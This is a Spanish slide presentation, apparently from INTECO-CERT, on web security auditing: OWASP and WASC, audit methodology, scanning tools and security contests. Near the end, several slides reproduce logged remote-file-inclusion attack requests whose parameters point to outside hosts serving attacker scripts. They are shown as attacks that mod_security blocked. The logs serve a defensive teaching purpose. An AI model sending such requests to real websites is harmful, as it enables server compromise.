Академический Документы
Профессиональный Документы
Культура Документы
AUDITORÍAS Y HERRAMIENTAS
0. Presentación INTECO
1. Auditorías Web
1) Introducción a la Seguridad Web
2) OWASP & WASC
3) Vulnerabilidades Web hoy en día
4) Procedimientos y técnicas de auditoria Web
2. Experiencias de INTECO-CERT
1) Experiencias de colaboración de INTECO-CERT
2
Índice
3
El Instituto Nacional de Tecnologías de la
Comunicación, INTECO
4
Actuaciones en e-Confianza de INTECO
1. ¿Qué es INTECO?
Instituto Nacional de Tecnologías de la Comunicación
OBJETIVOS
5
Actuaciones en e-Confianza de INTECO
Centro de Centro de
Respuesta a Referencia en
Incidentes en Laboratorio Accesibilidad y
Tecnologías de la Nacional de Calidad Estándares Web
Información para
PYMEs y Ciudadanos Formación Centro Nacional de
Tecnologías de la
Centro Promoción de Accesibilidad
Demostrador de proyectos TIC
Tecnologías de la Área de I+D+i en
Promoción de Accesibilidad Web.
Seguridad
estándares y
Observatorio de normalización Centro de Gestión
Seguridad de la de servicios públicos
Información interactivos - TDT
Ciudadanía e Internet
6
Actuaciones en e-Confianza de INTECO
3. Proyectos en e-Confianza
Centro Demostrador de
INTECO CERT Tecnologías de la
Seguridad
7
INTECO-CERT
Objetivos
8
INTECO-CERT
Servicios de Información:
• Suscripción a boletines y alertas
• Actualidad, noticias y eventos
• Avisos online sobre nuevos virus, vulnerabilidades, virus más extendidos
por correo electrónico, información sobre correo electrónico no deseado.
Servicios de Formación: guías, manuales, cursos online
Servicios de Protección: útiles gratuitos y actualizaciones de software
Servicios de Respuesta y Soporte:
• Gestión y resolución de Incidencias
• Gestión de Malware o código malicioso
• Fraude electrónico
• Asesoría Legal
• Foros
9
INTECO-CERT
10
INTECO-CERT
11
INTECO-CERT
Servicios de Información: SPAM. Red de
sensores de SPAM.
https://ersi.inteco.es/
CORREOS ELECTRÓNICOS
12
INTECO-CERT
Guías y Manuales.
Buenas prácticas.
Preguntas frecuentes.
Protección
13
INTECO-CERT
14
INTECO-CERT
Servicios de Respuesta y Soporte.
Gestión de incidencias o problemas de seguridad
15
INTECO-CERT
legal@cert.inteco.es
16
INTECO-CERT
17
Centro Demostrador de Tecnologías de la Seguridad
Objetivos
Fomentar y difundir el uso de tecnologías de seguridad de la información
http://demostrador.inteco.es
18
Centro Demostrador de Tecnologías de la Seguridad
Catálogo impreso
19
Centro Demostrador de Tecnologías de la Seguridad
Catálogo online
20
Centro Demostrador de Tecnologías de la Seguridad
21
Centro Demostrador de Tecnologías de la Seguridad
DATOS ACTUALES DEL
OFERTA ACTUAL DE PRODUCTOS
CATÁLOGO
Nº DE Nº DE Autenticación
EMPRESAS SOLUCIONES 104
Certificación y Acreditación 61
22
Centro Demostrador de Tecnologías de la Seguridad
Generar recomendaciones
23
Centro Demostrador de Tecnologías de la Seguridad
24
Centro Demostrador de Tecnologías de la Seguridad
Promoción de alianzas
2008 2009
50 convenios 8 convenios
sector.
25
Centro Demostrador de Tecnologías de la Seguridad
• Eventos propios
• I ENISE
II ENISE
26
Centro Demostrador de Tecnologías de la Seguridad
Formación a la Pyme
Identificación de amenazas
Elaboración de contenidos
Jornadas celebradas 25
Media de asistentes 90
27
Programa de Impulso de los SGSI (Sistema de
Gestión de Seguridad de la Información)
Líneas Generales
CATÁLOGO
ORGANISMOS
CERTIFICACIÓN SGSI
Seleccionan
Colabora
CÁMARAS DE
COMERCIO
JORNADAS Y
Organizan TALLERES PYME
Colabora SGSI
con
INTECO Colabora
28
Impulso DNIe: Perfiles de Protección
29
Resumen de Servicios de eConfianza.
30
Contactos
INTECO-CERT
• contacto@cert.inteco.es
• incidencias@cert.inteco.es
• fraude@cert.inteco.es
• legal@cert.inteco.es Centro Demostrador de Tecnologías
• http://cert.inteco.es de la Seguridad
• info.demostrador@inteco.es
• catalogo.demostrador@inteco.es
• jornadas.pyme@inteco.es
• http://demostrador.inteco.es
31
Dónde estamos
www.inteco.es
Sede
Sede de
de INTECO
INTECO
Avda.
Avda. Jose
Jose Aguado
Aguado 41
41
Edificio
Edificio INTECO
INTECO
24005
24005 LEÓN
LEÓN
Tel:
Tel: (+34)
(+34) 987
987 877
877 189
189
Fax:
Fax: (+34)
(+34) 987
987 261
261 016
016
32
¿Preguntas?
33
Seguridad Web
34
1. Auditorías Web
35
1. Auditorías Web
¿Qué es OWASP?
• Fundación sin animo de lucro.
• Creada en 2001.
• Independiente de los fabricantes.
• Formada por voluntarios.
Objetivos:
• Promover la seguridad de las aplicaciones web.
• Buscar las causas de la inseguridad.
• Proporcionar soluciones a las amenazas.
• Crear herramientas, documentación y estándares.
36
1. Auditorías Web
37
1. Auditorías Web
¿Qué es WASC?
• Participada por la industria, expertos y organizaciones.
• Foro abierto de participación.
Objetivos:
• Promover estándares de seguridad web.
• Elaboración de artículos y guías de seguridad web.
• Compartir el conocimiento sobre las amenazas web.
Proyectos:
• Application Security Scanner Evaluation Criteria.
• Web Hacking Incidents Database.
• Distributed Open Proxy Honeypots.
• Web Security Threat Classification.
38
1. Auditorías Web
• Vulnerabilidades Web
39
1. Auditorías Web
• Vulnerabilidades Web
40
1. Auditorías Web
• Vulnerabilidades Web
41
1. Auditorías Web
• Vulnerabilidades Web
42
1. Auditorías Web
• Vulnerabilidades Web
43
1. Auditorías Web
• Vulnerabilidades Web
44
1. Auditorías Web
Inyecciones de código.
45
1. Auditorías Web
http://www.owasp.org/index.php/Top_10_2007
http://www.owasp.org/index.php/Top_10_2004
46
1. Auditorías Web
Metodología de auditoria.
OWASP Testing.
Web Application Penetration Checklist.
OSSTMM.
47
1. Auditorías Web
Captura de evidencias.
49
2. Experiencias de INTECO-CERT
50
2. Experiencias de INTECO-CERT
51
3. Herramientas de auditoría Web
• Aplicaciones comerciales
Características comunes
Aspectos Configurables.
Un elevado precio.
52
3. Herramientas de auditoría Web
53
3. Herramientas de auditoría Web
54
3. Herramientas de auditoría Web
• HP WebInspect
55
3. Herramientas de auditoría Web
• Aplicaciones gratuitas
Características comunes
Son gratis ☺.
56
3. Herramientas de auditoría Web
• WebScarab
57
3. Herramientas de auditoría Web
• Paros
58
3. Herramientas de auditoría Web
• w3af
59
3. Herramientas de auditoría Web
60
3. Herramientas de auditoría Web
Video Soluciones
http://yehg.net/lab/pr0js/training/webgoat.php
61
3. Herramientas de auditoría Web
http://www.foundstone.com/us/resources-free-tools.asp
62
4. Otras fuentes de Información
63
4. Otras fuentes de Información
64
4. Otras fuentes de Información
/en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.a
ltervista.org/a.txt?? HTTP/1.1
/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.alter
vista.org/a.txt?? HTTP/1.1
/textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://ft
p.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF
/1? HTTP/1.1
//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://80.50.253.9
0/upload/071011004039p/old? HTTP/1.1
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
HTTP/1.1
65
4. Otras fuentes de Información
GET
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://80.3
4.102.151/joomla/1.gif?/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Close
Host: 85.17.35.X
User-Agent: Morfeus Fucking Scanner
mod_security-action: 406
66
4. Otras fuentes de Información
GET
/textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:/
/ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%F
F/1? HTTP/1.1
Connection: TE, close
Host: www.X.com
TE: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.808
mod_security-action: 406
67
4. Otras fuentes de Información
68
4. Otras fuentes de Información
CONCURSOS Y RETOS
Concurso BSGAME #1
http://blindsec.com:81/
http://www.yoire.com/1190-primer-torneo-de-seguridad-blindsec-bsgame-1
SecGame SG6Labs
http://www.sg6.es/labs/
69
¿Preguntas?
70
Muchas gracias
71
www.inteco.es